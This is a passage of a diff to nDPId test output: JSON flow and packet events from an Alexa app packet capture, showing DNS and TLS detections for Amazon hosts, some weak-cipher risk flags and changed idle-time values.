+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976037754,"flow_last_seen":1490976037754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976037754,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1490976037754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037754,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8+KpAAEAGE3KsECrYIsc08JXcAbvRHbWkAAAAAKAC\/\/+tAQAAAgQFtAQCCAoA9k0OAAAAAAEDAwg="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1490976037803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037803,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOoGYhwixzTwrBAq2AG7ldw4CtRs0R21paASaN+cagAAAgQFtAQCCApEF1cYAPZNDgEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1490976037807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976037807,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0+KtAAEAGE3msECrYIsc08JXcAbvRHbWlOArUbYAQAVcyugAAAQEICgD2TRREF1cY"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1490976041150,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976041150,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWlNAAEARM1+sECrYrBAqAdZmADUALY4\/ocgBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1490976041151,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976041151,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR0jdAAEARu2qsECoBrBAq2AA11mYAPRDBociBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAUABDRe6IY="} 00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976041151,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041156,"flow_last_seen":1490976041156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1490976041156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041156,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TnBAAEAG+H6sECrYNF7ohrJdAbvhYQATAAAAAKAC\/\/9vSwAAAgQFtAQCCAoA9k5jAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1490976041212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041212,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwBzRAAOcGmMY0XuiGrBAq2AG7sl2f4NcN4WEAFHASH\/5jwQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1490976041215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041215,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTnFAAEAG+JGsECrYNF7ohrJdAbvhYQAUn+DXDlAQAVeuMgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041384,"flow_last_seen":1490976041384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041384,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1490976041384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041384,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807JAAEAGczysECrYNF7ohrJeAbv1uZ3IAAAAAKAC\/\/+9JQAAAgQFtAQCCAoA9k56AAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041400,"flow_last_seen":1490976041400,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041400,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1490976041400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041400,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ul5AAEAGjJCsECrYNF7ohrJfAburivQiAAAAAKAC\/\/+w9wAAAgQFtAQCCAoA9k58AAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041428,"flow_last_seen":1490976041428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041428,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1490976041428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041428,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G65AAEAGvmusECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/V3gAAAgQFtAQCCAoA9k5+AAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041434,"flow_last_seen":1490976041434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1490976041434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041434,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hqRAAEAGEYasECrYwKgLAZX3H5Abo8jbAAAAAKAC\/\/+78QAAAgQFtAQCCAoA9k5\/AAAAAAEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976041437,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QlfcAAAAAG6PI3FAUAABzNwAAAAAAAAAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1490976041439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041439,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwm7lAAOcGBEE0XuiGrBAq2AG7sl5u82R89bmdyXASH\/5VMQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1490976041440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07NAAEAGc0+sECrYNF7ohrJeAbv1uZ3JbvNkfVAQAVefogAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1490976041446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041446,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwNmhAAOcGaZI0XuiGrBAq2AG7sl88IzNAq4r0I3ASH\/6tEQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1490976041447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041447,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoul9AAEAGjKOsECrYNF7ohrJfAburivQjPCMzQVAQAVf3ggAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041680,"flow_last_seen":1490976041680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1490976041680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzJAAEAGfuesECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9j3AAAAgQFtAQCCAoA9k6YAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041156,"flow_last_seen":1490976041156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1490976041156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041156,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TnBAAEAG+H6sECrYNF7ohrJdAbvhYQATAAAAAKAC\/\/9vSwAAAgQFtAQCCAoA9k5jAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1490976041212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041212,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwBzRAAOcGmMY0XuiGrBAq2AG7sl2f4NcN4WEAFHASH\/5jwQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1490976041215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041215,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTnFAAEAG+JGsECrYNF7ohrJdAbvhYQAUn+DXDlAQAVeuMgAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 